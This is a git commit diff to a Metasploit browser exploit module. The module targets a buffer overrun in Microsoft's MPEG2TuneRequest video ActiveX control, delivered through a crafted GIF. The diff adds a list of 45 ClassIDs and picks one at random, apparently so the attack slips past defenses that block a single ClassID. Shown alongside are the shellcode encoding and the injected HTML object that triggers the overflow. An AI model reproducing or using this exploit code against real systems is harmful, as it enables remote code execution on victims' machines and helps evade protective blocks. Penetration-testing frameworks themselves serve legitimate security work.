Exploit now uses a random ClassID from the list provided by the Microsoft Advisory rather than a static one (also configurable via an advanced option).

git-svn-id: file:///home/svn/framework3/trunk@6751 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-08 19:47:44 +00:00 · 2009-07-08 19:47:44 +00:00 · 02f7d6b586
parent a54b9a06ef
commit 02f7d6b586
1 changed files with 59 additions and 2 deletions
--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@ -29,6 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				DirectShow (BDATuner.MPEG2TuneRequest).
 				By loading a specially crafted GIF file, an attacker can overrun a buffer and 
 				execute arbitrary code.
+
+				ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ], 
@ -57,6 +59,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Jul 05 2009',
 			'DefaultTarget'  => 0))
+
+		register_advanced_options(
+			[
+				OptString.new('ClassID', [ false, "Specific ClassID to use (otherwise randomized)", nil ]),
+			], self.class)
 	end

 	def on_request_uri(cli, request)
@ -84,6 +91,56 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Re-generate the payload
 		return if ((p = regenerate_payload(cli)) == nil)

+		# Class IDs
+		clsids = [
+			"011B3619-FE63-4814-8A84-15A194CE9CE3",
+			"0149EEDF-D08F-4142-8D73-D23903D21E90",
+			"0369B4E5-45B6-11D3-B650-00C04F79498E",
+			"0369B4E6-45B6-11D3-B650-00C04F79498E",
+			"055CB2D7-2969-45CD-914B-76890722F112",
+			"0955AC62-BF2E-4CBA-A2B9-A63F772D46CF",
+			"15D6504A-5494-499C-886C-973C9E53B9F1",
+			"1BE49F30-0E1B-11D3-9D8E-00C04F72D980",
+			"1C15D484-911D-11D2-B632-00C04F79498E",
+			"1DF7D126-4050-47F0-A7CF-4C4CA9241333",
+			"2C63E4EB-4CEA-41B8-919C-E947EA19A77C",
+			"334125C0-77E5-11D3-B653-00C04F79498E",
+			"37B0353C-A4C8-11D2-B634-00C04F79498E",
+			"37B03543-A4C8-11D2-B634-00C04F79498E",
+			"37B03544-A4C8-11D2-B634-00C04F79498E",
+			"418008F3-CF67-4668-9628-10DC52BE1D08",
+			"4A5869CF-929D-4040-AE03-FCAFC5B9CD42",
+			"577FAA18-4518-445E-8F70-1473F8CF4BA4",
+			"59DC47A8-116C-11D3-9D8E-00C04F72D980",
+			"7F9CB14D-48E4-43B6-9346-1AEBC39C64D3",
+			"823535A0-0318-11D3-9D8E-00C04F72D980",
+			"8872FF1B-98FA-4D7A-8D93-C9F1055F85BB",
+			"8A674B4C-1F63-11D3-B64C-00C04F79498E",
+			"8A674B4D-1F63-11D3-B64C-00C04F79498E",
+			"9CD64701-BDF3-4D14-8E03-F12983D86664",
+			"9E77AAC4-35E5-42A1-BDC2-8F3FF399847C",
+			"A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980",
+			"A2E3074E-6C3D-11D3-B653-00C04F79498E",
+			"A2E30750-6C3D-11D3-B653-00C04F79498E",
+			"A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE",
+			"AD8E510D-217F-409B-8076-29C5E73B98E8",
+			"B0EDF163-910A-11D2-B632-00C04F79498E",
+			"B64016F3-C9A2-4066-96F0-BD9563314726",
+			"BB530C63-D9DF-4B49-9439-63453962E598",
+			"C531D9FD-9685-4028-8B68-6E1232079F1E",
+			"C5702CCC-9B79-11D3-B654-00C04F79498E",
+			"C5702CCD-9B79-11D3-B654-00C04F79498E",
+			"C5702CCE-9B79-11D3-B654-00C04F79498E",
+			"C5702CCF-9B79-11D3-B654-00C04F79498E",
+			"C5702CD0-9B79-11D3-B654-00C04F79498E",
+			"C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7",
+			"CAAFDD83-CEFC-4E3D-BA03-175F17A24F91",
+			"D02AAC50-027E-11D3-9D8E-00C04F72D980",
+			"F9769A06-7ACA-4E39-9CFB-97BB35F0E77E",
+			"FA7C375B-66A7-4280-879D-FD459C84BB02"
+		]
+		classid = datastore['ClassID'] || clsids[rand(clsids.size)]
+
 		# Encode the shellcode
 		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

@ -124,7 +181,7 @@ var #{msvidctl}=document.createElement('object');
 #{msvidctl}.width='1';
 #{msvidctl}.height='1';
 #{msvidctl}.data='#{get_resource + "/" + Time.now.to_i.to_s + ".gif"}';
-#{msvidctl}.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
+#{msvidctl}.classid='clsid:#{classid}';
 </script> 
 </body> 
 </html>|
@ -138,4 +195,4 @@ var #{msvidctl}=document.createElement('object');
 		handler(cli)
 	end

-end
+end